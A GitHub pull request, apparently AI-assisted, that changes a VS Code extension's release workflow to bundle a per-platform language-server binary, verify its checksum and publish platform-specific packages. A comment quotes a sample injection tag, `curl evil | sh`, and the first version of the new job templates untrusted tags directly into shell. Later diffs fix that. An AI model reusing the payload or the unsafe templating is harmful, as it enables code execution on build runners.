### PR TITLE
Bundle chordsketch-lsp binary in platform-specific VSIXes

### DIFF
--- a/.github/workflows/vscode-extension.yml
+++ b/.github/workflows/vscode-extension.yml
@@ -129,6 +129,12 @@ jobs:
             rust_target: x86_64-pc-windows-msvc
             server_dir: win32-x64
             ext: ".exe"
+          # Alpine rows deliberately reuse linux server_dir: platform.ts reads
+          # process.platform which returns "linux" on Alpine (there is no "alpine"
+          # value). The musl binary must land under server/linux-x64 or
+          # server/linux-arm64; the alpine-* VSIX channel is what routes it to
+          # musl users. Do NOT "fix" this to server/alpine-*/ — that would break
+          # Tier 3 resolution on Alpine.
           - vs_target: alpine-x64
             rust_target: x86_64-unknown-linux-musl
             server_dir: linux-x64
@@ -169,20 +175,40 @@ jobs:
 
       - name: Resolve release tag
         id: tag
-        run: |
-          if [ "${{ github.event_name }}" = "release" ]; then
-            echo "tag=${{ github.event.release.tag_name }}" >> "$GITHUB_OUTPUT"
-          else
-            echo "tag=${{ inputs.tag }}" >> "$GITHUB_OUTPUT"
-          fi
-
-      - name: Download chordsketch-lsp from release
+        # Route the tag through `env:` rather than templating `${{ ... }}`
+        # directly into the shell script. Shell interpolation of untrusted
+        # input at YAML-template time is the classic Actions script-injection
+        # pattern (a tag like `v1.0.0"; curl evil | sh; #` would execute).
+        # `env:` + `"$VAR"` defers expansion to bash, which quotes correctly.
+        # The regex validation below is defense in depth: even a properly
+        # quoted bogus value shouldn't reach `gh release download`.
         env:
-          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+          EVENT_NAME: ${{ github.event_name }}
+          RELEASE_TAG: ${{ github.event.release.tag_name }}
+          INPUT_TAG: ${{ inputs.tag }}
         run: |
           set -euo pipefail
-          TAG="${{ steps.tag.outputs.tag }}"
-          RT="${{ matrix.rust_target }}"
+          if [ "$EVENT_NAME" = "release" ]; then
+            TAG="$RELEASE_TAG"
+          else
+            TAG="$INPUT_TAG"
+          fi
+          if ! printf '%s' "$TAG" | grep -Eq '^v[0-9]+\.[0-9]+\.[0-9]+(-[A-Za-z0-9.-]+)?$'; then
+            echo "Rejecting malformed tag: $TAG" >&2
+            exit 1
+          fi
+          echo "tag=$TAG" >> "$GITHUB_OUTPUT"
+
+      - name: Download and verify chordsketch-lsp from release
+        env:
+          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+          TAG: ${{ steps.tag.outputs.tag }}
+          RT: ${{ matrix.rust_target }}
+          VS_TARGET: ${{ matrix.vs_target }}
+          SERVER_SUBDIR: ${{ matrix.server_dir }}
+          EXT: ${{ matrix.ext }}
+        run: |
+          set -euo pipefail
           # release.yml emits .zip for Windows targets, .tar.gz for everything else.
           # Archive layouts differ (verified against v0.2.1):
           #   - tar.gz: wraps files in a top-level "chordsketch-<tag>-<target>/" dir
@@ -190,35 +216,54 @@ jobs:
           #   - zip: files sit at the archive root, no top-level dir
           #     (PowerShell `Compress-Archive -Path "$Staging/*"`)
           # Extraction below uses `unzip -j` and `tar --strip-components=1` to
-          # normalise both into SERVER_DIR regardless of internal layout.
-          if [ "${{ matrix.vs_target }}" = "win32-x64" ]; then
+          # normalise both into SERVER_DIR. `-j` is defense-in-depth against a
+          # future release.yml refactor that reintroduces a wrapping directory.
+          if [ "$VS_TARGET" = "win32-x64" ]; then
             ARCHIVE="chordsketch-${TAG}-${RT}.zip"
           else
             ARCHIVE="chordsketch-${TAG}-${RT}.tar.gz"
           fi
-          gh release download "$TAG" -R koedame/chordsketch --pattern "$ARCHIVE"
-          SERVER_DIR="packages/vscode-extension/server/${{ matrix.server_dir }}"
+          # Download both the archive and checksums.txt, then verify SHA-256
+          # before trusting the archive. The LSP binary auto-executes on user
+          # machines when a .cho file is opened, so unsigned trust of a
+          # mutable release asset would be a supply-chain hole. release.yml
+          # emits checksums.txt alongside archives via `sha256sum`.
+          gh release download "$TAG" -R koedame/chordsketch \
+            --pattern "$ARCHIVE" \
+            --pattern "checksums.txt"
+          grep -E "[[:space:]]${ARCHIVE}\$" checksums.txt | sha256sum -c -
+          SERVER_DIR="packages/vscode-extension/server/${SERVER_SUBDIR}"
           mkdir -p "$SERVER_DIR"
-          BIN="chordsketch-lsp${{ matrix.ext }}"
+          BIN="chordsketch-lsp${EXT}"
           if [[ "$ARCHIVE" == *.zip ]]; then
             unzip -j "$ARCHIVE" "$BIN" -d "$SERVER_DIR/"
           else
             tar xzf "$ARCHIVE" --strip-components=1 -C "$SERVER_DIR/" \
               --wildcards "*/${BIN}"
           fi
-          chmod +x "$SERVER_DIR/${BIN}" || true
+          # Fail loud if extraction missed the binary. The Unix exec bit must
+          # be set for the LSP to launch at runtime; Windows ignores it.
+          test -f "$SERVER_DIR/${BIN}"
+          if [ -z "$EXT" ]; then
+            chmod +x "$SERVER_DIR/${BIN}"
+          fi
           ls -la "$SERVER_DIR/"
 
       - name: Package platform-specific VSIX
         working-directory: packages/vscode-extension
-        run: ./node_modules/.bin/vsce package --no-dependencies --target ${{ matrix.vs_target }}
+        env:
+          VS_TARGET: ${{ matrix.vs_target }}
+        run: ./node_modules/.bin/vsce package --no-dependencies --target "$VS_TARGET"
 
       - name: Verify binary is inside the VSIX
         working-directory: packages/vscode-extension
+        env:
+          SERVER_SUBDIR: ${{ matrix.server_dir }}
+          EXT: ${{ matrix.ext }}
         run: |
           set -euo pipefail
           VSIX=$(ls *.vsix | head -n1)
-          unzip -l "$VSIX" | grep "server/${{ matrix.server_dir }}/chordsketch-lsp${{ matrix.ext }}"
+          unzip -l "$VSIX" | grep -F "server/${SERVER_SUBDIR}/chordsketch-lsp${EXT}"
 
       - name: Upload platform VSIX artifact
         uses: actions/upload-artifact@ea165f8d65b6e75b540449e92b4886f43607fa02 # v4
@@ -289,6 +334,22 @@ jobs:
           pattern: chordsketch-vsix-*
           merge-multiple: true
           path: packages/vscode-extension/
+
+      - name: Verify expected VSIX count before publishing
+        # Fail closed when a platform is missing rather than silently shipping
+        # an incomplete set. build-platform is fail-fast: false, so a single
+        # missing release asset would otherwise still let the other 6 publish
+        # and leave one platform's users falling back to the universal VSIX
+        # (no bundled LSP — the regression #1786 was meant to close).
+        working-directory: packages/vscode-extension
+        run: |
+          set -euo pipefail
+          count=$(ls -1 *.vsix 2>/dev/null | wc -l)
+          if [ "$count" -ne 8 ]; then
+            echo "Expected 1 universal + 7 platform VSIXes (=8), got $count:" >&2
+            ls -1 *.vsix >&2 || true
+            exit 1
+          fi
 
       - name: Publish to Marketplace
         # vsce reads VSCE_PAT from the environment natively (>= 3.x), so no --pat flag needed.
@@ -362,6 +423,17 @@ jobs:
           pattern: chordsketch-vsix-*
           merge-multiple: true
           path: packages/vscode-extension/
+
+      - name: Verify expected VSIX count before publishing
+        working-directory: packages/vscode-extension
+        run: |
+          set -euo pipefail
+          count=$(ls -1 *.vsix 2>/dev/null | wc -l)
+          if [ "$count" -ne 8 ]; then
+            echo "Expected 1 universal + 7 platform VSIXes (=8), got $count:" >&2
+            ls -1 *.vsix >&2 || true
+            exit 1
+          fi
 
       - name: Publish to Open VSX
         # ovsx reads OVSX_PAT from the environment natively (no --pat flag

--- a/.github/workflows/vscode-extension.yml
+++ b/.github/workflows/vscode-extension.yml
@@ -218,7 +218,11 @@ jobs:
           # Extraction below uses `unzip -j` and `tar --strip-components=1` to
           # normalise both into SERVER_DIR. `-j` is defense-in-depth against a
           # future release.yml refactor that reintroduces a wrapping directory.
-          if [ "$VS_TARGET" = "win32-x64" ]; then
+          # Use EXT (.exe on Windows targets) as the archive-format discriminator
+          # so adding a future target like win32-arm64 "just works" — the
+          # previous `VS_TARGET = win32-x64` check would silently download
+          # .tar.gz for a new Windows cell and fail extraction.
+          if [ "$EXT" = ".exe" ]; then
             ARCHIVE="chordsketch-${TAG}-${RT}.zip"
           else
             ARCHIVE="chordsketch-${TAG}-${RT}.tar.gz"

--- a/.github/workflows/vscode-extension.yml
+++ b/.github/workflows/vscode-extension.yml
@@ -235,7 +235,12 @@ jobs:
           gh release download "$TAG" -R koedame/chordsketch \
             --pattern "$ARCHIVE" \
             --pattern "checksums.txt"
-          grep -E "[[:space:]]${ARCHIVE}\$" checksums.txt | sha256sum -c -
+          # Exact-filename match: extract the checksum line whose second
+          # whitespace-separated field equals $ARCHIVE, rather than a regex
+          # match where dots in ARCHIVE would match any char. Then pipe the
+          # single canonical line to `sha256sum -c -` for verification.
+          awk -v a="$ARCHIVE" '$2 == a { print; found = 1 } END { exit !found }' \
+            checksums.txt | sha256sum -c -
           SERVER_DIR="packages/vscode-extension/server/${SERVER_SUBDIR}"
           mkdir -p "$SERVER_DIR"
           BIN="chordsketch-lsp${EXT}"
@@ -340,18 +345,27 @@ jobs:
           path: packages/vscode-extension/
 
       - name: Verify expected VSIX count before publishing
-        # Fail closed when a platform is missing rather than silently shipping
+        # Fail closed when any platform is missing rather than silently shipping
         # an incomplete set. build-platform is fail-fast: false, so a single
-        # missing release asset would otherwise still let the other 6 publish
-        # and leave one platform's users falling back to the universal VSIX
-        # (no bundled LSP — the regression #1786 was meant to close).
+        # missing release asset would otherwise still let the remaining
+        # platforms publish and leave the affected platform's users falling back
+        # to the universal VSIX (no bundled LSP — the regression #1786 was
+        # meant to close).
+        # NOTE: EXPECTED must be updated whenever a target is added or removed
+        # from the build-platform matrix. 1 universal + N platform entries = N+1.
         working-directory: packages/vscode-extension
         run: |
           set -euo pipefail
-          count=$(ls -1 *.vsix 2>/dev/null | wc -l)
-          if [ "$count" -ne 8 ]; then
-            echo "Expected 1 universal + 7 platform VSIXes (=8), got $count:" >&2
-            ls -1 *.vsix >&2 || true
+          EXPECTED=8
+          # nullglob makes *.vsix expand to nothing rather than the literal
+          # pattern when no files match, so the count step doesn't abort
+          # under pipefail before printing its diagnostic.
+          shopt -s nullglob
+          files=(*.vsix)
+          count=${#files[@]}
+          if [ "$count" -ne "$EXPECTED" ]; then
+            echo "Expected $EXPECTED VSIXes (1 universal + 7 platform), got $count:" >&2
+            printf '  %s\n' "${files[@]}" >&2
             exit 1
           fi
 

--- a/.github/workflows/vscode-extension.yml
+++ b/.github/workflows/vscode-extension.yml
@@ -94,9 +94,143 @@ jobs:
           if-no-files-found: error
           retention-days: 7
 
+  build-platform:
+    name: Package ${{ matrix.vs_target }} VSIX
+    runs-on: ubuntu-latest
+    # Release-only matrix that downloads the per-platform chordsketch-lsp
+    # binary from the GitHub Release assets (produced by release.yml), places
+    # it at server/<platform>-<arch>/chordsketch-lsp[.exe], and packages a
+    # platform-specific VSIX. Needed for Tier 3 of the LSP resolver in
+    # packages/vscode-extension/src/platform.ts to succeed post-install. See #1786.
+    if: >-
+      github.event_name == 'release' ||
+      (github.event_name == 'workflow_dispatch' && inputs.tag != '')
+    strategy:
+      fail-fast: false
+      matrix:
+        include:
+          - vs_target: linux-x64
+            rust_target: x86_64-unknown-linux-gnu
+            server_dir: linux-x64
+            ext: ""
+          - vs_target: linux-arm64
+            rust_target: aarch64-unknown-linux-gnu
+            server_dir: linux-arm64
+            ext: ""
+          - vs_target: darwin-x64
+            rust_target: x86_64-apple-darwin
+            server_dir: darwin-x64
+            ext: ""
+          - vs_target: darwin-arm64
+            rust_target: aarch64-apple-darwin
+            server_dir: darwin-arm64
+            ext: ""
+          - vs_target: win32-x64
+            rust_target: x86_64-pc-windows-msvc
+            server_dir: win32-x64
+            ext: ".exe"
+          - vs_target: alpine-x64
+            rust_target: x86_64-unknown-linux-musl
+            server_dir: linux-x64
+            ext: ""
+          - vs_target: alpine-arm64
+            rust_target: aarch64-unknown-linux-musl
+            server_dir: linux-arm64
+            ext: ""
+    steps:
+      - uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4
+
+      - name: Set up Node.js
+        uses: actions/setup-node@53b83947a5a98c8d113130e565377fae1a50d02f # v6.3.0
+        with:
+          node-version: "22"
+          cache: "npm"
+          cache-dependency-path: packages/vscode-extension/package-lock.json
+
+      - name: Install @chordsketch/wasm (web + node builds)
+        run: |
+          mkdir -p packages/npm
+          cd packages/npm
+          npm pack @chordsketch/wasm@latest 2>/dev/null || true
+          if ls chordsketch-wasm-*.tgz 1>/dev/null 2>&1; then
+            tar xzf chordsketch-wasm-*.tgz --strip-components=1
+            echo "Unpacked @chordsketch/wasm"
+          else
+            echo "WARNING: @chordsketch/wasm not available from registry; WASM preview will be absent in this build."
+          fi
+
+      - name: Install dependencies
+        run: npm ci
+        working-directory: packages/vscode-extension
+
+      - name: Build
+        run: npm run build
+        working-directory: packages/vscode-extension
+
+      - name: Resolve release tag
+        id: tag
+        run: |
+          if [ "${{ github.event_name }}" = "release" ]; then
+            echo "tag=${{ github.event.release.tag_name }}" >> "$GITHUB_OUTPUT"
+          else
+            echo "tag=${{ inputs.tag }}" >> "$GITHUB_OUTPUT"
+          fi
+
+      - name: Download chordsketch-lsp from release
+        env:
+          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+        run: |
+          set -euo pipefail
+          TAG="${{ steps.tag.outputs.tag }}"
+          RT="${{ matrix.rust_target }}"
+          # release.yml emits .zip for Windows targets, .tar.gz for everything else.
+          # Archive layouts differ (verified against v0.2.1):
+          #   - tar.gz: wraps files in a top-level "chordsketch-<tag>-<target>/" dir
+          #     (Unix `tar czf ARCHIVE STAGING`)
+          #   - zip: files sit at the archive root, no top-level dir
+          #     (PowerShell `Compress-Archive -Path "$Staging/*"`)
+          # Extraction below uses `unzip -j` and `tar --strip-components=1` to
+          # normalise both into SERVER_DIR regardless of internal layout.
+          if [ "${{ matrix.vs_target }}" = "win32-x64" ]; then
+            ARCHIVE="chordsketch-${TAG}-${RT}.zip"
+          else
+            ARCHIVE="chordsketch-${TAG}-${RT}.tar.gz"
+          fi
+          gh release download "$TAG" -R koedame/chordsketch --pattern "$ARCHIVE"
+          SERVER_DIR="packages/vscode-extension/server/${{ matrix.server_dir }}"
+          mkdir -p "$SERVER_DIR"
+          BIN="chordsketch-lsp${{ matrix.ext }}"
+          if [[ "$ARCHIVE" == *.zip ]]; then
+            unzip -j "$ARCHIVE" "$BIN" -d "$SERVER_DIR/"
+          else
+            tar xzf "$ARCHIVE" --strip-components=1 -C "$SERVER_DIR/" \
+              --wildcards "*/${BIN}"
+          fi
+          chmod +x "$SERVER_DIR/${BIN}" || true
+          ls -la "$SERVER_DIR/"
+
+      - name: Package platform-specific VSIX
+        working-directory: packages/vscode-extension
+        run: ./node_modules/.bin/vsce package --no-dependencies --target ${{ matrix.vs_target }}
+
+      - name: Verify binary is inside the VSIX
+        working-directory: packages/vscode-extension
+        run: |
+          set -euo pipefail
+          VSIX=$(ls *.vsix | head -n1)
+          unzip -l "$VSIX" | grep "server/${{ matrix.server_dir }}/chordsketch-lsp${{ matrix.ext }}"
+
+      - name: Upload platform VSIX artifact
+        uses: actions/upload-artifact@ea165f8d65b6e75b540449e92b4886f43607fa02 # v4
+        with:
+          name: chordsketch-vsix-${{ matrix.vs_target }}
+          path: packages/vscode-extension/*.vsix
+          if-no-files-found: error
+          retention-days: 7
+
   publish:
     name: Publish to VS Code Marketplace
-    needs: [build]
+    needs: [build, build-platform]
     runs-on: ubuntu-latest
     # Publish only on GitHub Release (published) events or when workflow_dispatch supplies a tag.
     #
@@ -143,22 +277,39 @@ jobs:
         run: npm ci
         working-directory: packages/vscode-extension
 
-      - name: Download VSIX artifact
+      - name: Download universal VSIX artifact
         uses: actions/download-artifact@d3f86a106a0bac45b974a628896c90dbdf5c8093 # v4
         with:
           name: chordsketch-vsix
           path: packages/vscode-extension/
 
+      - name: Download platform VSIX artifacts
+        uses: actions/download-artifact@d3f86a106a0bac45b974a628896c90dbdf5c8093 # v4
+        with:
+          pattern: chordsketch-vsix-*
+          merge-multiple: true
+          path: packages/vscode-extension/
+
       - name: Publish to Marketplace
         # vsce reads VSCE_PAT from the environment natively (>= 3.x), so no --pat flag needed.
+        # Loop per-VSIX so one platform failing does not block the others; each
+        # platform-specific VSIX carries its own --target metadata from packaging.
         env:
           VSCE_PAT: ${{ secrets.VSCE_PAT }}
-        run: ./node_modules/.bin/vsce publish --packagePath *.vsix
         working-directory: packages/vscode-extension
+        run: |
+          set -euo pipefail
+          status=0
+          for vsix in *.vsix; do
+            echo "::group::Publishing $vsix"
+            ./node_modules/.bin/vsce publish --packagePath "$vsix" || status=1
+            echo "::endgroup::"
+          done
+          exit "$status"
 
   publish-openvsx:
     name: Publish to Open VSX Registry
-    needs: [build]
+    needs: [build, build-platform]
     runs-on: ubuntu-latest
     # Publish only on GitHub Release (published) events or when workflow_dispatch supplies a tag.
     #
@@ -199,10 +350,17 @@ jobs:
         run: npm ci
         working-directory: packages/vscode-extension
 
-      - name: Download VSIX artifact
+      - name: Download universal VSIX artifact
         uses: actions/download-artifact@d3f86a106a0bac45b974a628896c90dbdf5c8093 # v4
         with:
           name: chordsketch-vsix
+          path: packages/vscode-extension/
+
+      - name: Download platform VSIX artifacts
+        uses: actions/download-artifact@d3f86a106a0bac45b974a628896c90dbdf5c8093 # v4
+        with:
+          pattern: chordsketch-vsix-*
+          merge-multiple: true
           path: packages/vscode-extension/
 
       - name: Publish to Open VSX
@@ -210,5 +368,13 @@ jobs:
         # needed), matching the pattern used for vsce + VSCE_PAT above.
         env:
           OVSX_PAT: ${{ secrets.OPEN_VSX_TOKEN }}
-        run: ./node_modules/.bin/ovsx publish *.vsix
         working-directory: packages/vscode-extension
+        run: |
+          set -euo pipefail
+          status=0
+          for vsix in *.vsix; do
+            echo "::group::Publishing $vsix"
+            ./node_modules/.bin/ovsx publish "$vsix" || status=1
+            echo "::endgroup::"
+          done
+          exit "$status"


### PR DESCRIPTION
## What

Adds a release-only matrix job to `vscode-extension.yml` that downloads the
`chordsketch-lsp` binary from the GitHub Release assets for each supported
platform, stages it at `server/<platform>-<arch>/chordsketch-lsp[.exe]`, and
packages a platform-specific VSIX via `vsce package --target <vs-target>`.
Publish jobs now fan in both the universal artifact and the 7 platform
artifacts and loop per-VSIX so one platform failing does not block the rest.

## Why

Tier 3 of the LSP resolver in `packages/vscode-extension/src/platform.ts`
expects `server/<platform>-<arch>/chordsketch-lsp[.exe]` inside the VSIX,
but the current universal VSIX ships no binary, so users without
`cargo`/Homebrew/Scoop see:

> ChordSketch: chordsketch-lsp binary not found…

`release.yml` already builds `chordsketch-lsp` for all 7 Rust targets —
this PR wires that output into the extension packaging so install-and-go
works on every supported platform (rust-analyzer pattern). Closes #1786.

## Platform matrix

| VS Code target | Rust target | `server/` dir |
|---|---|---|
| linux-x64 | x86_64-unknown-linux-gnu | linux-x64 |
| linux-arm64 | aarch64-unknown-linux-gnu | linux-arm64 |
| darwin-x64 | x86_64-apple-darwin | darwin-x64 |
| darwin-arm64 | aarch64-apple-darwin | darwin-arm64 |
| win32-x64 | x86_64-pc-windows-msvc | win32-x64 |
| alpine-x64 | x86_64-unknown-linux-musl | linux-x64 |
| alpine-arm64 | aarch64-unknown-linux-musl | linux-arm64 |

Both alpine targets map to `server/linux-x64` / `server/linux-arm64`
because `process.platform === 'linux'` on Alpine; only the marketplace
target identifier distinguishes the musl build.

## PR/push CI behaviour

Unchanged — the existing universal `build` job is the only one that
runs on push/PR, keeping feedback fast and toolchain-free. The new
`build-platform` matrix is gated to `release` / `workflow_dispatch`
with a non-empty tag.

## Archive-layout normalisation

`release.yml` emits two layouts (verified against v0.2.1):

- tar.gz: files under a top-level `chordsketch-<tag>-<target>/` dir
  (Unix `tar czf`). Extracted with `tar --strip-components=1`.
- zip: files at the archive root (PowerShell `Compress-Archive -Path
  "$Staging/*"`). Extracted with `unzip -j`.

A `Verify binary is inside the VSIX` step greps the packaged `.vsix` so
an extraction-layout regression would fail the job rather than silently
shipping an empty `server/` dir.

## Sister-site audit

Per `.claude/rules/fix-propagation.md` groups: this is a VS Code
packaging change — not a renderer, FFI/WASM/NAPI binding, external tool
invocation, or sanitiser. No sibling code paths to update. (Zed and
JetBrains extensions have their own LSP strategies, separate issues.)

## Test plan

- [x] Local extraction smoke on `v0.2.1` release assets — both tar.gz
      (linux-gnu) and zip (windows-msvc) layouts produced the expected
      `chordsketch-lsp[.exe]` under `server/<platform>-<arch>/`.
- [x] Local `vsce package --no-dependencies --target linux-x64` produced
      `chordsketch-linux-x64-0.2.1.vsix` containing
      `extension/server/linux-x64/chordsketch-lsp` (5.27 MB).
- [x] YAML parses (`python3 -c 'import yaml; yaml.safe_load(...)'`).
- [ ] CI run on this PR confirms the existing universal `build` job
      still produces a single universal VSIX (no `build-platform`
      matrix runs on PR).
- [ ] Post-merge `workflow_dispatch` with `tag: v0.2.1` produces 7
      platform VSIXes + 1 universal VSIX and publishes all 8 to VS Code
      Marketplace and Open VSX.
- [ ] Next `release.yml` run auto-triggers `vscode-extension.yml` via
      the `release: published` event and publishes the same 8 VSIXes.
- [ ] Clean VM install on macOS arm64 / Windows x64 shows the LSP
      server starting automatically (no "binary not found" message).

Closes #1786

🤖 Generated with [Claude Code](https://claude.com/claude-code)